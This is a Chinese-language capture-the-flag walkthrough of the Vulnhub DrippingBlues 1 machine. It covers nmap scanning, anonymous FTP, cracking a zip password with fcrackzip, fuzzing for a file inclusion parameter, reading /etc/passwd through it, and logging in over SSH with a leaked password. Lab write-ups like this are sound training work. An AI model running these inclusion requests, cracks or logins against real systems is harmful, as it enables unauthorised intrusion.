Vulnhub之Drippingblues 1解题详细过程
Drippingblue
Identify IP Address of Target
─(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
利用netdiscover工具识别目标主机的IP地址为192.168.56.123
NMAP Scanning
─(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.123 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-16 00:34 EDT
Nmap scan report for localhost (192.168.56.123)
Host is up (0.0020s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.101
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
| 256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
|_ 256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/dripisreal.txt /etc/dripispowerful.html
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:E6:24:10 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.00 seconds
Enumeration
─(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ ftp 192.168.56.123
Connected to 192.168.56.123.
220 (vsFTPd 3.0.3)
Name (192.168.56.123:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||5213|)
150 Here comes the directory listing.
-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||43217|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Sep 19 2021 .
drwxr-xr-x 2 0 0 4096 Sep 19 2021 ..
-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip
226 Directory send OK.
ftp> get respectmydrip.zip
local: respectmydrip.zip remote: respectmydrip.zip
229 Entering Extended Passive Mode (|||11871|)
150 Opening BINARY mode data connection for respectmydrip.zip (471 bytes).
100% |********************************| 471 679.41 KiB/s 00:00 ETA
226 Transfer complete.
471 bytes received in 00:00 (449.17 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ ls
nmap_full_scan respectmydrip.zip
┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ unzip respectmydrip.zip
Archive: respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password:
FTP服务允许匿名访问,从其下载respectmydrip.zip文件,但是为加密文件。
看能否破解
─(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip
PASSWORD FOUND!!!!: pw == 0725280
35
─(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ unzip respectmydrip.zip
Archive: respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password:
extracting: respectmydrip.txt
inflating: secret.zip
┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ ls
nmap_full_scan respectmydrip.txt respectmydrip.zip secret.zip
┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ unzip secret.zip
Archive: secret.zip
[secret.zip] secret.txt password:
破解后仍然是一个被加密的文件secret.zip,尝试继续破解, 没有陈宫
─(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u secret.zip
┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$
这里应该是用户名:travisscott, thugger
──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ curl http://192.168.56.123/robots.txt
User-agent: *
Disallow: /dripisreal.txt
Disallow: /etc/dripispowerful.html
─(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ curl http://192.168.56.123/dripisreal.txt
hello dear hacker wannabe,
go for this lyrics:
https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html
count the n words and put them side by side then md5sum it
ie, hellohellohellohello >> md5sum hellohellohellohello
it's the password of ssh
──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ gobuster dir -u http://192.168.56.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.123
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/10/16 05:16:05 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
===============================================================
2022/10/16 05:16:33 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ dirb http://192.168.56.123
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Oct 16 05:17:01 2022
URL_BASE: http://192.168.56.123/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.123/ ----
+ http://192.168.56.123/index.php (CODE:200|SIZE:138)
+ http://192.168.56.123/robots.txt (CODE:200|SIZE:78)
+ http://192.168.56.123/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Sun Oct 16 05:17:03 2022
DOWNLOADED: 4612 - FOUND: 3
联想到/robots.txt有个/etc/dripispowerful.html
是否会存在文件包含漏洞,用ffuf破解参数
──(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ ffuf -ic -c -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 'http://192.168.56.123/index.php?FUZZ=/etc/passwd' -fs 138
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.56.123/index.php?FUZZ=/etc/passwd
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : true
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 138
________________________________________________
:: Progress: [40/220547] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: :: Progress: [686/220547] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :
发现参数名为drip
─(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ curl http://192.168.56.123/index.php?drip=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:124:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:125:130:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
thugger:x:1001:1001:,,,:/home/thugger:/bin/bash
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
mysql:x:127:133:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:128:134:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
<html>
<body>
driftingblues is hacked again so it's now called drippingblues. :D hahaha
<br>
by
<br>
travisscott & thugger
</body>
</html>
从返回结果也验证了目标主机有用户: thugger
还有在robots.txt文件中提到了/etc/dripispowerful.html
用drip参数再次访问
其页面源代码为:
<!DOCTYPE html>
<html>
<body>
<style>
body {
background-image: url('drippin.jpg');
background-repeat: no-repeat;
}
@font-face {
font-family: Segoe;
src: url('segoeui.ttf');
}
.mainfo {
text-align: center;
border: 1px solid #000000;
font-family: 'Segoe';
padding: 5px;
background-color: #ffffff;
margin-top: 300px;
}
.emoji {
width: 32px;
}
</style>
password is:
imdrippinbiatch
</body>
</html>
<html>
<body>
driftingblues is hacked again so it's now called drippingblues. :D hahaha
<br>
by
<br>
travisscott & thugger
</body>
</html>
发现了密码:imdrippinbiatch
Exploit
─(kali㉿kali)-[~/Vulnhub/Drippingblue]
└─$ ssh thugger@192.168.56.123
The authenticity of host '192.168.56.123 (192.168.56.123)' can't be established.
ED25519 key fingerprint is SHA256:eVoGERVw0lG6hbny1KztaN+fD1oHC/zhGfuexoATqME.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.123' (ED25519) to the list of known hosts.
thugger@192.168.56.123's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.11.0-34-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
495 updates can be installed immediately.
233 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
thugger@drippingblues:~$ id
uid=1001(thugger) gid=1001(thugger) groups=1001(thugger)
thugger@drippingblues:~$
thugger@drippingblues:/tmp$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 102048 11688 ? Ss 07:30 0:00 /sbin/init splash
root 2 0.0 0.0 0 0 ? S 07:30 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I< 07:30 0:00 [rcu_gp]
root 4 0.0 0.0 0 0 ? I< 07:30 0:00 [rcu_par_gp]
root 6 0.0 0.0 0 0 ? I< 07:30 0:00 [kworker/0:0H-events_highpri]
root 9 0.0 0.0 0 0 ? I< 07:30 0:00 [mm_percpu_wq]
root 10 0.0 0.0 0 0 ? S 07:30 0:00 [rcu_tasks_rude_]
root 11 0.0 0.0 0 0 ? S 07:30 0:00 [rcu_tasks_trace]
root 12 0.0 0.0 0 0 ? S 07:30 0:00 [ksoftirqd/0]
root 13 0.0 0.0 0 0 ? I 07:30 0:00 [rcu_sched]
root 14 0.0 0.0 0 0 ? S 07:30 0:00 [migration/0]
root 15 0.0 0.0 0 0 ? S 07:30 0:00 [idle_inject/0]
root 16 0.0 0.0 0 0 ? S 07:30 0:00 [cpuhp/0]
root 17 0.0 0.0 0 0 ? S 07:30 0:00 [kdevtmpfs]
root 18 0.0 0.0 0 0 ? I< 07:30 0:00 [netns]
root 19 0.0 0.0 0 0 ? I< 07:30 0:00 [inet_frag_wq]
root 20 0.0 0.0 0 0 ? S 07:30 0:00 [kauditd]
root 21 0.0 0.0 0 0 ? S 07:30 0:00 [khungtaskd]
root 22 0.0 0.0 0 0 ? S 07:30 0:00 [oom_reaper]
root 23 0.0 0.0 0 0 ? I< 07:30 0:00 [writeback]
root 24 0.0 0.0 0 0 ? S 07:30 0:00 [kcompactd0]
root 25 0.0 0.0 0 0 ? SN 07:30 0:00 [ksmd]
root 26 0.0 0.0 0 0 ? SN 07:30 0:00 [khugepaged]
root 72 0.0 0.0 0 0 ? I< 07:30 0:00 [kintegrityd]
root 73 0.0 0.0 0 0 ? I< 07:30 0:00 [kblockd]
root 74 0.0 0.0 0 0 ? I< 07:30 0:00 [blkcg_punt_bio]
root 75 0.0 0.0 0 0 ? I< 07:30 0:00 [tpm_dev_wq]
root 76 0.0 0.0 0 0 ? I< 07:30 0:00 [ata_sff]
root 77 0.0 0.0 0 0 ? I< 07:30 0:00 [md]
root 78 0.0 0.0 0 0 ? I< 07:30 0:00 [edac-poller]
root 79 0.0 0.0 0 0 ? I< 07:30 0:00 [devfreq_wq]
root 80 0.0 0.0 0 0 ? S 07:30 0:00 [watchdogd]
root 82 0.0 0.0 0 0 ? I< 07:30 0:00 [kworker/0:1H-kblockd]
root 84 0.0 0.0 0 0 ? S 07:30 0:00 [kswapd0]
root 85 0.0 0.0 0 0 ? S 07:30 0:00 [ecryptfs-kthrea]
root 87 0.0 0.0 0 0 ? I< 07:30 0:00 [kthrotld]
root 88 0.0 0.0 0 0 ? I< 07:30 0:00 [acpi_thermal_pm]
root 89 0.0 0.0 0 0 ? S 07:30 0:00 [scsi_eh_0]
root 90 0.0 0.0 0 0 ? I< 07:30 0:00 [scsi_tmf_0]
root 91 0.0 0.0 0 0 ? S 07:30 0:00 [scsi_eh_1]
root 92 0.0 0.0 0 0 ? I< 07:30 0:00 [scsi_tmf_1]
root 94 0.0 0.0 0 0 ? I< 07:30 0:00 [vfio-irqfd-clea]
root 95 0.0 0.0 0 0 ? I< 07:30 0:00 [ipv6_addrconf]
root 105 0.0 0.0 0 0 ? I< 07:30 0:00 [kstrp]
root 108 0.0 0.0 0 0 ? I< 07:30 0:00 [zswap-shrink]
root 109 0.0 0.0 0 0 ? I< 07:30 0:00 [kworker/u3:0]
root 114 0.0 0.0 0 0 ? I< 07:30 0:00 [charger_manager]
root 136 0.0 0.0 0 0 ? I 07:30 0:03 [kworker/0:2-events]
root 157 0.0 0.0 0 0 ? S 07:30 0:00 [scsi_eh_2]
root 159 0.0 0.0 0 0 ? I< 07:30 0:00 [scsi_tmf_2]
root 181 0.0 0.0 0 0 ? S 07:30 0:00 [jbd2/sda5-8]
root 182 0.0 0.0 0 0 ? I< 07:30 0:00 [ext4-rsv-conver]
root 222 0.0 0.4 68304 18156 ? S<s 07:30 0:00 /lib/systemd/systemd-journald
root 243 0.0 0.0 0 0 ? S 07:30 0:00 [irq/18-vmwgfx]
root 248 0.0 0.0 0 0 ? I< 07:30 0:00 [ttm_swap]
root 249 0.0 0.0 0 0 ? S 07:30 0:00 [card0-crtc0]
root 250 0.0 0.0 0 0 ? S 07:30 0:00 [card0-crtc1]
root 252 0.0 0.0 0 0 ? S< 07:30 0:00 [loop0]
root 255 0.0 0.0 0 0 ? S 07:30 0:00 [card0-crtc2]
root 257 0.0 0.0 0 0 ? S 07:30 0:00 [card0-crtc3]
root 258 0.0 0.0 0 0 ? S< 07:30 0:00 [loop1]
root 261 0.0 0.0 0 0 ? S 07:30 0:00 [card0-crtc4]
root 262 0.0 0.1 24136 7620 ? Ss 07:30 0:00 /lib/systemd/systemd-udevd
root 263 0.0 0.0 0 0 ? S< 07:30 0:00 [loop2]
root 264 0.0 0.0 0 0 ? S 07:30 0:00 [card0-crtc5]
root 265 0.0 0.0 0 0 ? S 07:30 0:00 [card0-crtc6]
root 266 0.0 0.0 0 0 ? S< 07:30 0:00 [loop3]
root 267 0.0 0.0 0 0 ? S 07:30 0:00 [card0-crtc7]
root 268 0.0 0.0 0 0 ? S< 07:30 0:00 [loop4]
root 269 0.0 0.0 0 0 ? S< 07:30 0:00 [loop5]
root 274 0.0 0.0 0 0 ? S< 07:30 0:00 [loop6]
root 275 0.0 0.0 0 0 ? S< 07:30 0:00 [loop7]
root 276 0.0 0.0 0 0 ? S< 07:30 0:00 [loop8]
root 277 0.0 0.0 0 0 ? S< 07:30 0:00 [loop9]
root 312 0.0 0.0 0 0 ? I< 07:30 0:00 [cryptd]
systemd+ 501 0.0 0.3 24060 12192 ? Ss 07:30 0:00 /lib/systemd/systemd-resolved
systemd+ 502 0.0 0.1 90424 6372 ? Ssl 07:30 0:00 /lib/systemd/systemd-timesyncd
root 533 0.0 0.2 244632 9648 ? Ssl 07:30 0:00 /usr/lib/accountsservice/accou
root 534 0.0 0.0 2548 776 ? Ss 07:30 0:00 /usr/sbin/acpid
avahi 537 0.0 0.0 8508 3504 ? Ss 07:30 0:00 avahi-daemon: running [drippin
root 538 0.0 0.0 12156 3128 ? Ss 07:30 0:00 /usr/sbin/cron -f
message+ 540 0.0 0.1 8784 5892 ? Ss 07:30 0:00 /usr/bin/dbus-daemon --system
root 541 0.0 0.5 341100 21852 ? Ssl 07:30 0:00 /usr/sbin/NetworkManager --no-
root 550 0.0 0.5 41992 20184 ? Ss 07:30 0:00 /usr/bin/python3 /usr/bin/netw
root 552 0.0 0.2 239120 11636 ? Ssl 07:30 0:00 /usr/lib/policykit-1/polkitd -
syslog 554 0.0 0.1 224332 4664 ? Ssl 07:30 0:00 /usr/sbin/rsyslogd -n -iNONE
root 563 0.0 0.7 630280 29316 ? Ssl 07:30 0:00 /usr/lib/snapd/snapd
root 564 0.0 0.1 238344 5928 ? Ssl 07:30 0:00 /usr/libexec/switcheroo-contro
root 566 0.0 0.2 17064 8328 ? Ss 07:30 0:00 /lib/systemd/systemd-logind
root 576 0.0 0.3 395576 14260 ? Ssl 07:30 0:00 /usr/lib/udisks2/udisksd
root 577 0.0 0.1 13672 4844 ? Ss 07:30 0:00 /sbin/wpa_supplicant -u -s -O
avahi 585 0.0 0.0 8328 332 ? S 07:30 0:00 avahi-daemon: chroot helper
root 649 0.0 0.2 31296 8776 ? Ss 07:30 0:00 /usr/sbin/cupsd -l
root 665 0.0 0.3 180432 12700 ? Ssl 07:30 0:00 /usr/sbin/cups-browsed
root 668 0.0 0.2 240004 10376 ? Ssl 07:30 0:00 /usr/sbin/ModemManager --filte
root 677 0.0 0.5 120548 23008 ? Ssl 07:30 0:00 /usr/bin/python3 /usr/share/un
root 679 0.0 0.0 6816 2988 ? Ss 07:30 0:00 /usr/sbin/vsftpd /etc/vsftpd.c
root 716 0.0 0.2 242204 8836 ? Ssl 07:30 0:00 /usr/sbin/gdm3
root 718 0.0 0.1 12168 7288 ? Ss 07:30 0:00 sshd: /usr/sbin/sshd -D [liste
root 740 0.0 0.2 169384 9288 ? Sl 07:30 0:00 gdm-session-worker [pam/gdm-la
whoopsie 777 0.0 0.3 178068 13808 ? Ssl 07:30 0:00 /usr/bin/whoopsie -f
kernoops 781 0.0 0.0 11248 448 ? Ss 07:30 0:00 /usr/sbin/kerneloops --test
kernoops 783 0.0 0.0 11248 444 ? Ss 07:30 0:00 /usr/sbin/kerneloops
root 837 0.0 0.4 194040 18364 ? Ss 07:30 0:00 /usr/sbin/apache2 -k start
gdm 839 0.0 0.2 19164 10308 ? Ss 07:30 0:00 /lib/systemd/systemd --user
gdm 840 0.0 0.0 103328 3448 ? S 07:30 0:00 (sd-pam)
www-data 844 0.0 0.3 194528 13228 ? S 07:30 0:02 /usr/sbin/apache2 -k start
gdm 872 0.0 0.3 1069608 14624 ? S<sl 07:30 0:00 /usr/bin/pulseaudio --daemoniz
gdm 874 0.0 0.6 514024 24440 ? SNsl 07:30 0:00 /usr/libexec/tracker-miner-fs
gdm 875 0.0 0.1 164384 5964 tty1 Ssl+ 07:30 0:00 /usr/lib/gdm3/gdm-wayland-sess
gdm 877 0.0 0.1 7808 5060 ? Ss 07:30 0:00 /usr/bin/dbus-daemon --session
mysql 878 0.0 9.3 1287372 378540 ? Ssl 07:30 0:11 /usr/sbin/mysqld
gdm 884 0.0 0.3 267344 15616 tty1 Sl+ 07:30 0:00 /usr/libexec/gnome-session-bin
gdm 885 0.0 0.1 242436 7944 ? Ssl 07:30 0:00 /usr/libexec/gvfsd
rtkit 886 0.0 0.0 152924 3020 ? SNsl 07:30 0:00 /usr/libexec/rtkit-daemon
gdm 911 0.0 0.2 316528 8220 ? Sl 07:30 0:00 /usr/libexec/gvfsd-fuse /run/u
gdm 916 0.0 0.2 320120 11764 ? Ssl 07:30 0:00 /usr/libexec/gvfs-udisks2-volu
gdm 926 0.0 0.1 240712 6956 ? Ssl 07:30 0:00 /usr/libexec/gvfs-gphoto2-volu
gdm 931 0.0 0.1 238440 6600 ? Ssl 07:30 0:00 /usr/libexec/gvfs-mtp-volume-m
gdm 944 0.0 0.1 238612 6296 ? Ssl 07:30 0:00 /usr/libexec/gvfs-goa-volume-m
gdm 963 0.0 0.8 544328 36040 ? Sl 07:30 0:00 /usr/libexec/goa-daemon
gdm 974 0.0 0.1 92784 4316 ? Ssl 07:30 0:00 /usr/libexec/gnome-session-ctl
gdm 980 0.0 0.1 242764 5956 ? Sl 07:30 0:00 /usr/bin/gnome-keyring-daemon
gdm 989 0.0 0.4 488944 16932 ? Ssl 07:30 0:00 /usr/libexec/gnome-session-bin
gdm 1001 0.0 4.5 3555992 184896 ? Ssl 07:30 0:03 /usr/bin/gnome-shell
gdm 1008 0.0 0.2 321276 11488 ? Sl 07:30 0:00 /usr/libexec/goa-identity-serv
gdm 1010 0.0 0.2 319464 9044 ? Ssl 07:30 0:00 /usr/libexec/gvfs-afc-volume-m
root 1019 0.0 0.2 254856 9732 ? Ssl 07:30 0:00 /usr/lib/upower/upowerd
gdm 1063 0.0 0.2 309508 8224 ? Ssl 07:30 0:00 /usr/libexec/at-spi-bus-launch
gdm 1068 0.0 0.1 7224 4244 ? S 07:30 0:00 /usr/bin/dbus-daemon --config-
gdm 1071 0.0 0.9 120792 40072 ? S 07:30 0:00 /usr/bin/Xwayland :1024 -rootl
gdm 1090 0.0 0.1 156100 5444 ? Sl 07:30 0:00 /usr/libexec/dconf-service
gdm 1093 0.0 0.1 238332 4608 ? Ssl 07:30 0:00 /usr/libexec/xdg-permission-st
gdm 1104 0.0 0.6 2601240 26456 ? Sl 07:30 0:00 /usr/bin/gjs /usr/share/gnome-
gdm 1106 0.0 0.1 162756 6744 ? Sl 07:30 0:00 /usr/libexec/at-spi2-registryd
gdm 1116 0.0 0.2 316488 9236 ? Ssl 07:30 0:00 /usr/libexec/gsd-a11y-settings
gdm 1117 0.0 0.6 346160 25352 ? Ssl 07:30 0:00 /usr/libexec/gsd-color
gdm 1118 0.0 0.6 345148 24640 ? Ssl 07:30 0:00 /usr/libexec/gsd-keyboard
gdm 1119 0.0 0.6 613648 26920 ? Ssl 07:30 0:00 /usr/libexec/gsd-media-keys
gdm 1120 0.0 0.6 345844 25532 ? Ssl 07:30 0:00 /usr/libexec/gsd-power
gdm 1121 0.0 0.2 250948 11492 ? Ssl 07:30 0:00 /usr/libexec/gsd-print-notific
gdm 1123 0.0 0.1 459836 6208 ? Ssl 07:30 0:00 /usr/libexec/gsd-rfkill
gdm 1128 0.0 0.2 320520 10520 ? Ssl 07:30 0:00 /usr/libexec/gsd-smartcard
gdm 1129 0.0 0.2 324244 11052 ? Ssl 07:30 0:00 /usr/libexec/gsd-sound
gdm 1130 0.0 0.2 464184 9404 ? Ssl 07:30 0:00 /usr/libexec/gsd-usb-protectio
gdm 1131 0.0 0.6 344936 24396 ? Ssl 07:30 0:00 /usr/libexec/gsd-wacom
gdm 1132 0.0 0.2 320808 10656 ? Ssl 07:30 0:00 /usr/libexec/gsd-wwan
gdm 1181 0.0 0.3 344900 15368 ? Sl 07:30 0:00 /usr/libexec/gsd-printer
gdm 1214 0.0 0.2 464732 10484 ? Sl 07:30 0:00 ibus-daemon --panel disable -r
gdm 1216 0.0 1.4 449204 59640 ? Ssl 07:30 0:00 /usr/libexec/gsd-xsettings
gdm 1226 0.0 0.2 242844 8728 ? Sl 07:30 0:00 /usr/libexec/ibus-dconf
gdm 1230 0.0 0.7 202880 29752 ? Sl 07:30 0:00 /usr/libexec/ibus-x11 --kill-d
colord 1232 0.0 0.4 251672 16756 ? Ssl 07:30 0:00 /usr/libexec/colord
gdm 1236 0.0 0.2 242824 8760 ? Sl 07:30 0:00 /usr/libexec/ibus-portal
gdm 1259 0.0 0.2 169148 8748 ? Sl 07:30 0:00 /usr/libexec/ibus-engine-simpl
root 2310 0.0 0.0 0 0 ? I 11:21 0:00 [kworker/u2:0-events_power_eff
root 2392 0.0 0.0 0 0 ? I 11:28 0:00 [kworker/u2:2-events_unbound]
root 2494 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/0:0-events]
www-data 2597 0.1 0.3 194520 13128 ? S 12:19 0:00 /usr/sbin/apache2 -k start
www-data 2624 0.0 0.3 194520 13148 ? S 12:19 0:00 /usr/sbin/apache2 -k start
www-data 2649 0.0 0.3 194520 13148 ? S 12:19 0:00 /usr/sbin/apache2 -k start
www-data 2667 0.0 0.3 194520 13128 ? S 12:19 0:00 /usr/sbin/apache2 -k start
www-data 2669 0.0 0.3 194528 13256 ? S 12:19 0:00 /usr/sbin/apache2 -k start
www-data 2670 0.0 0.3 194520 13148 ? S 12:19 0:00 /usr/sbin/apache2 -k start
www-data 2674 0.0 0.3 194520 13188 ? S 12:19 0:00 /usr/sbin/apache2 -k start
www-data 2678 0.0 0.3 194528 13796 ? S 12:19 0:00 /usr/sbin/apache2 -k start
www-data 2681 0.0 0.3 194520 13148 ? S 12:19 0:00 /usr/sbin/apache2 -k start
root 2695 0.0 0.2 13988 9048 ? Ss 12:26 0:00 sshd: thugger [priv]
thugger 2698 0.0 0.2 18788 10056 ? Ss 12:26 0:00 /lib/systemd/systemd --user
thugger 2699 0.0 0.0 103568 3588 ? S 12:26 0:00 (sd-pam)
thugger 2717 0.0 0.3 283092 14468 ? Ssl 12:26 0:00 /usr/bin/pulseaudio --daemoniz
thugger 2719 0.0 0.6 661456 24424 ? SNsl 12:26 0:00 /usr/libexec/tracker-miner-fs
thugger 2726 0.0 0.1 7360 4412 ? Ss 12:26 0:00 /usr/bin/dbus-daemon --session
thugger 2733 0.0 0.1 242436 7780 ? Ssl 12:26 0:00 /usr/libexec/gvfsd
thugger 2738 0.0 0.2 382064 8468 ? Sl 12:26 0:00 /usr/libexec/gvfsd-fuse /run/u
thugger 2760 0.0 0.2 320128 11628 ? Ssl 12:26 0:00 /usr/libexec/gvfs-udisks2-volu
thugger 2767 0.0 0.1 240712 6860 ? Ssl 12:26 0:00 /usr/libexec/gvfs-gphoto2-volu
thugger 2771 0.0 0.1 238440 6536 ? Ssl 12:26 0:00 /usr/libexec/gvfs-mtp-volume-m
thugger 2775 0.0 0.1 238612 6360 ? Ssl 12:26 0:00 /usr/libexec/gvfs-goa-volume-m
thugger 2779 0.0 0.9 544456 36340 ? Sl 12:26 0:00 /usr/libexec/goa-daemon
thugger 2802 0.0 0.2 395144 11812 ? Sl 12:26 0:00 /usr/libexec/goa-identity-serv
